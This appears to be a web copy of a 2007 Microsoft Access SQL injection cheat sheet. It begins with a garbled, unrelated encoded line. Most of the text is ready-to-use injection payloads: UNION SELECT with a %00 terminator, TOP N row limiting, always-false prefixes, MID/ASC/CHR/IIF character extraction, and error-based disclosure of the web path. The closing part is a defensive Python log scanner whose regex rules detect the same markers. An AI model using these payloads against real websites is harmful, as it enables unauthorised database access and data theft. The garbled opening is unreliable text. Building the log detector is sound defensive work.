Ò׽ؽØÍ¼Èí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

A fairly complete Access SQL injection reference

 Access SQL Injection Reference
Version 0.2.1
(Last updated 10/10/2007)
Original author unknown
 
Description: SQL query and notes
Comment characters: Access has no dedicated comment syntax, so "/*", "--" and "#" cannot be used. The null character "NULL" (%00) can be used instead:
' UNION SELECT 1,1,1 from validTableName%00
 
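Syntax error message: "[Microsoft][Driver ODBC Microsoft Access]"
Stacked queries: Not supported.
UNION queries: Access supports UNION queries. The from keyword after UNION must name a table that already exists.
Subqueries: Access supports subqueries (for example, "TOP 1" returns the contents of the first row):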
' AND (SELECT TOP 1 'someData' from validTableName)%00
 
LIMIT support: LIMIT is not supported, but "TOP N" can be declared in the query to limit the number of rows returned:
' UNION SELECT TOP 3 AttrName from validTableName%00 : this statement returns the (first) 3 rows.
 
Making a query return 0 rows: Very useful when the script shows only the result of the first query in the HTML it returns:
' AND 1=0 UNION SELECT AttrName1,AttrName2 from validTableName%00
 
String concatenation: The CONCAT() function is not supported. The "&" or "+" operator can be used to join two strings. Both operators must be URL-encoded when used:
' UNION SELECT 'web' %2b 'app' from validTableName%00 : returns "webapp"
' UNION SELECT 'web' %26 'app' from validTableName%00 : returns "webapp"
 
Substring: MID() function:
' UNION SELECT MID('abcd',1,1) from validTableName%00 : returns "a"
' UNION SELECT MID('abcd',2,1) from validTableName%00 : returns "b"
 
String length: LEN() function:
' UNION SELECT LEN('1234') from validTableName%00 : returns 4
 
Web path disclosure: Done by running a SELECT against a database that does not exist. Access responds with an error message that contains the full path:
' UNION SELECT 1 from ThisIsAFakeName.FakeTable%00
 
ASCII value of a character: ASC() function:
' UNION SELECT ASC('A') from ValidTable%00 : returns 65 (the ASCII value of 'A')
 
ASCII value to character: CHR() function:
' UNION SELECT CHR(65) from validTableName%00 : returns 'A'
 
IF statement: The IIF() function can be used. Syntax: IIF(condition, true, false):
' UNION SELECT IIF(1=1, 'a', 'b') from validTableName%00 : returns 'a'
 
Time-based inference: There is no function like BENCHMARK() or SLEEP(), but a large (high-load) query can be used to achieve the same effect.
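
The markers listed in the table above also work as detection signatures. The following added example, which is not part of the original reference, scores request URLs from web-server access logs against them; the rule weights, the threshold, the log layout and the .asp page names are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# (rule name, pattern run on the decoded parameter, weight).
# Patterns follow the entries in the reference above; weights are assumptions.
RULES = [
    ("null_byte_terminator", re.compile(r"\x00"), 3),  # %00 in place of a comment
    ("union_select", re.compile(r"\bunion\s+select\b", re.I), 3),
    ("select_top_n", re.compile(r"\bselect\s+top\s+\d+\b", re.I), 2),
    ("always_false_prefix", re.compile(r"\band\s+1\s*=\s*0\b", re.I), 2),
    ("access_functions", re.compile(r"\b(?:iif|mid|len|asc|chr)\s*\(", re.I), 1),
]
# Assumed layout: client address first, request line in double quotes.
LOG_RX = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def score_request(url):
    """Return (score, sorted rule names) for the query string of one URL."""
    hits = {}
    for pair in urlsplit(url).query.split("&"):
        # Split on the raw '&' first and decode afterwards, so an encoded
        # %26 or %2b inside a value is not treated as a separator.
        decoded = unquote_plus(pair)
        for name, pattern, weight in RULES:
            if pattern.search(decoded):
                hits[name] = weight
    return sum(hits.values()), sorted(hits)


def flag_lines(lines, threshold=3):
    """Return (client, score, rules) for each line scoring >= threshold."""
    flagged = []
    for line in lines:
        match = LOG_RX.match(line)
        if match:
            score, rules = score_request(match.group(2))
            if score >= threshold:
                flagged.append((match.group(1), score, rules))
    return flagged


# Constructed sample lines: documentation addresses, hypothetical .asp pages.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2007:10:00:01 +0000] "GET /item.asp?id=5 HTTP/1.1" 200 512',
    '192.0.2.44 - - [10/Oct/2007:10:00:07 +0000] "GET /item.asp?id=5\'+UNION+SELECT+1,1,1+from+validTableName%00 HTTP/1.1" 500 310',
    '192.0.2.44 - - [10/Oct/2007:10:00:09 +0000] "GET /item.asp?id=5\'+AND+1=0+UNION+SELECT+TOP+3+AttrName+from+validTableName%00 HTTP/1.1" 200 498',
    '192.0.2.10 - - [10/Oct/2007:10:00:12 +0000] "GET /search.asp?q=top+10+union+jobs HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, score, rules in flag_lines(SAMPLE_LOG):
        print(client, score, ",".join(rules))
```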

